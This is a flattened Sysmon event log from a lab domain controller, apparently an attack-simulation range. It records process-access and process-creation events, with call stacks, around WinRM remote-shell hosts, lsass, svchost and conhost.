13:33:19.341{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.278{59A5CD1D-8CA9-6005-1300-00000000A201}12681244C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.278{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.263{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CB02-00000000A201}4148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.255{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.247{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.950{59A5CD1D-8CA9-6005-1300-00000000A201}12682032C:\Windows\system32\svchost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.935{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D302-00000000A201}3292C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 